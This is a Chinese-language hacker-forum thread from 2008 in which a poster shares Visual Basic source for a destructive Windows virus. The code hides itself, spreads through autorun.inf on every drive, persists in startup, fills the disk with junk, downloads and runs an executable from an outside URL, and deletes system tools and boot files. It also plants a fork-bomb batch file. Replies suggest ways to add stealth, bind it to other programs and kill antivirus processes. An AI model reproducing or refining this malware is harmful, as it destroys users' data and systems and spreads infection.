[原创]VB写的功能比较全的病毒
文章作者:紫衣★行者信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
以前写过一个AUTORUN专杀,遭到了很多批评及建议,这个病毒无聊之作,只不过是功能比较全而已,而且没有写传播的代码,我很懒,又很笨.:sweat: :sweat: :cry: :cry:[code]
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Public Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Sub Form_Load()
App.TaskVisible = False '任务栏隐藏
On Error Resume Next
'复制自身到各个盘起
For A = 1 To 24
FileCopy App.Path + "\" + App.EXEName + ".exe", Chr(A) + ":\system.exe" '复制自身到每个盘的system.exe文件以躲避任务管理器追杀,因为我还不会在任务管理器里隐藏任务
SetAttr Chr(A) + ":\system.exe", vbHidden '将system.exe设置为隐藏属性
SetAttr Chr(A) + ":\system.exe", vbSystem '将system.exe设置为系统属性
A = A + 1
Next
'复制自身到各个盘止
'给每个盘加AUTORUN.INF起
For A = 1 To 24
Open Chr(A) + ":\AUTORUN.inf" For Output As #1 '创建一个名为AUTORUN.INF的文件
Print #1, "[autorun]" '写入数据
Print #1, "OPEN=System.exe /autorun"
Close #1 '关闭#1写入数据任务
Next
'给每个盘加AUTORUN.INF止
'复制自身到启动起
FileCopy Chr(A) + ":\system.exe", "C:\Documents and Settings\All Users\[开始]菜单\程序\启动\system.exe" '将SYSTEM.EXE复制到启动,注意是ALL USERS ,这样能使所有用户的启动都有这个文件
SetAttr "C:\Documents and Settings\All Users\[开始]菜单\程序\启动\system.exe", vbHidden '设置为隐藏
SetAttr "C:\Documents and Settings\All Users\[开始]菜单\程序\启动\system.exe", vbSystem '设置为系统
'复制自身到启动止
'制造垃圾文件起
For A = 1 To 99999 '为了不造成死循环用的FOR 循环
Open "C:\" + A For Output As #2
Print #2, "因为汉字占的空间大,所以我这里用的是汉字.打发迪斯科浪费该工具书的敢死队建立客观圣诞节立刻;四大皆空乐观集散地棵国家看来洒家感似的可怜见感到可是了圣诞节立刻根据地上赶得上急口令该撒旦连脚裤根据地撒个撒旦古生界地讴歌教科书大概 根据地顺口溜工具书的个是国家可是独立国急口令国家棵四大皆空乐观建立可是个说得来客观集散地看来个"
Next
'制造垃圾文件止
'下载病毒或木马起
'大家可以下个鸽子什么的,盗个Q号什么的,因为我没有木马,所以胡乱写的一个地址(这就相当于病毒的一个延伸)
'另外连续下载文件会造成死机,如果下载的文件多可比制造垃圾文件占用的空间大多了
H = URLDownloadToFile(0, "http://www.123.com/123.exe", "c:\123.exe", 0, 0) '下载
Shell "c:\123.exe" '启动
'下载病毒或木马止
'开始破坏起
Dim y As String
y = GetWindowsDirectory
Kill y + "\system32\notepad.exe"
Kill y + "\system32\cmd.exe"
Kill y + "\system32\calc.exe"
Kill y + "\system32\mspaint.exe"
Kill y + "\system32\regedit.exe"
Kill y + "\system32\msconfig.exe"
Kill y + "\system32\notepad.exe"
Kill "C:\NTDETECT.COM"
Kill "C:\IO.SYS"
Kill "C:\config.sys"
Kill "C:\pagefile.sys"
Kill "C:\hiberfil.sys"
Kill "C:\boot.ini"
Kill "C:\bootfont.bin"
Kill "C:\ntldr"
'开始破坏止
'恶作剧起
For A = 1 To 9999
Shell "iexplore" '打开IE
Next
Open "1.bat" For Output As #3
Print #3, "@echo off" '命令摘抄于《三行整人的BAT文件》
Print #3, "@echo start c:\1.bat>>c:\1.bat"
Print #3, "start c:\1.bat"
'恶作剧止
End Sub
[/code] URLDownloadToFile....
AUTORUN.INF...
还有用不?
....对于现在的杀毒软件,你这个已经没效果了.你还没动手人家先把你干掉了.
Kill xxx..........能干掉哪个?
至少先关闭系统文件保护吧?
也不知道功能全在哪里.... 就像风泽说的,自我保护能力太弱,lz应该先将自我保存再进行传播破坏,而且要尽可能的隐形进行,这点要向磁碟机学习,低调的行事,不像熊猫那样的嚣张,太容易被杀了。
自我防护弱的病毒对付瑞星还差不多,遇到卡巴金山之类的主动防御健全的,就没有生路了:lol: (少灌点,以免禁言扣分) 顶沙发的,感觉这个东西的好多作用都起不了,URLDownloadToFile....,
AUTORUN.INF...,KILL.................,我也没有多好的技术,有个想法就是如果你把AUTORUN.INF.这个去掉,改成和其他的文件捆绑,比如和QQ捆绑。。。和什么什么捆绑,要不你来狠一点把所有的EXE都绑了(前提是绑了之后要能正常运行哈),这样也可以的吧。
个人意见,仅供参考,说的不对的还望指教。。。 功能全?
病毒?
上次那个很“牛B”的所谓的 “专杀”还嫌不够过瘾吧?
根本没病毒的一点儿特性。现在的娃真是学了点儿东西就自大的不得了。
用VB封装个bat。这能叫程序呀?
哎。
不过这次到是还调用了几个可怜的API。。。。 URLDownloadToFile?
估计过不了防火墙吧 ?
是不是应该想K掉啊
KILL文件? 有权限么?
正在使用的怎么删除 不过这里建议同替换 神不只鬼不觉 感觉楼主要写点强大的病毒,用DELPHI可能会更好吧,个人意见, 谈技术就谈技术,不要对楼主冷嘲热讽的。首先人家开源就不错了。
风气真受不了。
其他的说两句,vb的病毒太大了,而且运行需要虚拟机,速度也不好。同意8喽的意见,用Delphi会好点。
(其实对Delphi一点也不熟,只是感觉和VB界面想点,代码又和C#很像) Kill "C:\NTDETECT.COM"
Kill "C:\IO.SYS"
Kill "C:\config.sys"
Kill "C:\pagefile.sys"
Kill "C:\hiberfil.sys"
Kill "C:\boot.ini"
Kill "C:\bootfont.bin"
Kill "C:\ntldr"
不如感染好些, 直接让系统over了,AUTORUN.INF URLDownloadToFile这些好象就没用了. [quote]原帖由 [i]nightxie[/i] 于 2008-4-13 22:31 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=141256&ptid=32776][img]images/common/back.gif[/img][/url]
谈技术就谈技术,不要对楼主冷嘲热讽的。首先人家开源就不错了。
风气真受不了。
其他的说两句,vb的病毒太大了,而且运行需要虚拟机,速度也不好。同意8喽的意见,用Delphi会好点。
(其实对Delphi一点也不熟,只是感觉和VB界面 ... [/quote]
不是风气受不了,为什么回复的人会有这样的言语?那你有没有想想楼主自己的标题是怎么写的?标题很牛,而内容却是那样不实在,不谈他使用是N年前的一些东西,就看看程序中就那样几个功能竟然说功能很全。。。而且写的很挫,不引起点冷嘲热讽才怪呢,如果楼主能取个实在点的标题我想就不会出现这样的情况了。 [quote]原帖由 [i]末日逐沙[/i] 于 2008-4-13 01:50 发表 [url=https://forum.eviloctal.com/redirect.php?goto=findpost&pid=141199&ptid=32776][img]images/common/back.gif[/img][/url]
就像风泽说的,自我保护能力太弱,lz应该先将自我保存再进行传播破坏,而且要尽可能的隐形进行,这点要向磁碟机学习,低调的行事,不像熊猫那样的嚣张,太容易被杀了。
自我防护弱的病毒对付瑞星还差不多,遇到卡巴金山之类的主动防 ... [/quote]
金山的主动防御可是弱的不行,瑞星的主动防御有些方面还是很BT的,楼上滴勿可乱说.....[s:264]
[[i] 本帖最后由 认真的雪 于 2008-4-16 19:45 编辑 [/i]] 不过开了把冰刃,把瑞星的进程全删了,瑞星就全都挂了。实在不敢恭维,如果病毒代码中加入了冰刃或者狙剑的一般手段,瑞星不知道还能不能活着。
我是新手,谢谢您提醒,我是前两天看了一个关于kv',金山和费尔还有瑞星的bt处理比较帖子后才说的,当时瑞星确实不怎么:lol:
[[i] 本帖最后由 末日逐沙 于 2008-4-17 16:52 编辑 [/i]]
回复 12楼 末日逐沙 的帖子
你说的了冰刃或者狙剑或者其他一些ANTIROOTKIT都是使用了一些非正常手段。现在有防就有破的时代没有个东西是绝对的。现在是越来越猥亵了。。。全都搞到RING0下去了。。。那就比谁钻的深,谁更猥亵。 [quote]原帖由 [i]末日逐沙[/i] 于 2008-4-17 16:51 发表 [url=https://forum.eviloctal.com/redirect.php?goto=findpost&pid=141430&ptid=32776][img]images/common/back.gif[/img][/url]
不过开了把冰刃,把瑞星的进程全删了,瑞星就全都挂了。实在不敢恭维,如果病毒代码中加入了冰刃或者狙剑的一般手段,瑞星不知道还能不能活着。
我是新手,谢谢您提醒,我是前两天看了一个关于kv',金山和费尔还有瑞星的bt处理比较 ... [/quote]
要说杀进程冰刃或者狙剑用的可不是低级的技术,而且在ring0下要结束金山,卡巴7之类的也是轻而易举的,恢复ssdt,直接kill就可以了,只不过是对付不同的进程保护方法,所应用的手段也会不同罢了,而不能说冰刃之类的软件没法结束其进程就说明其保护能力有多强。不过最新的kv2008,和sudami大牛分析的不同了,做了改进,确实比较萎缩,不过要kill她也是不难的。而瑞星再文件监控上也是很萎缩滴[s:263] [quote]原帖由 [i]认真的雪[/i] 于 2008-4-18 14:01 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=141496&ptid=32776][img]images/common/back.gif[/img][/url]
在ring0下要结束金山,卡巴7之类的也是轻而易举的,恢复ssdt,直接kill就可以了。。。[/quote]
KIS7 没那么容易吧。。。呵呵~~小雪试试看。。 [quote]原帖由 [i]风泽[/i] 于 2008-4-18 14:24 发表 [url=https://forum.eviloctal.com/redirect.php?goto=findpost&pid=141499&ptid=32776][img]images/common/back.gif[/img][/url]
KIS7 没那么容易吧。。。呵呵~~小雪试试看。。 [/quote]
原来kis7有进程守护呀,前段时间,偶恢复ssdt,然后用任务管理器,一kill,能结束进程了,竟然没发现会双进程相互守护....偶太佩服偶自己了...
这下丢脸了....难为情.....
要感谢风泽大哥提醒哇[s:284]
上午研究了下
[url=https://forum.eviloctal.com/thread-32879-1-1.html]https://forum.eviloctal.com/thread-32879-1-1.html[/url] 大家可是说错了哦,本人确实是十岁,但是七月一过,本人就11周岁了诶
[[i] 本帖最后由 紫衣★行者 于 2008-4-19 16:45 编辑 [/i]] FOR %%a IN ( C: D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z: ) do ATTRIB -R -H -S -A %%a\AUTORUN.INF & DEL /F /Q /A %%a\AUTORUN.INF & md %%a\autorun.inf & ATTRIB +S +R +H +A %%a\autorun.inf & cacls %%a/autorun.inf /c /e /d everyone & ATTRIB -R -H -S -A %%a\AUTORUN.ini & DEL /F /Q /A %%a\AUTORUN.ini & md %%a\AUTORUN.ini & ATTRIB +S +R +H +A %%a\AUTORUN.ini & cacls %%a/AUTORUN.ini /c /e /d everyone [quote]原帖由 [i]风泽[/i] 于 2008-4-19 17:22 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=141572&ptid=32776][img]images/common/back.gif[/img][/url]
继续努力!写出更好的东西,建议学习C语言。 [/quote]
很想问一下,学习C语言有没有一些好的书籍或者教程的,谢谢风泽了(不是技术回复,不知道会不会禁言) URLDownloadToFile....
1.杀软都盯这个函数
2.不过主动
3........... URLDownloadToFile 貌似被杀了
部分代码是网络上拼凑把。 [url]http://www.123.com/123.exe[/url]
这个网址是你自己的?
我也支持你继续努力,我也是从VB学起的不过水平比较低
其实现在换一种语言会好些
我感觉VB能力有限
页:
[1]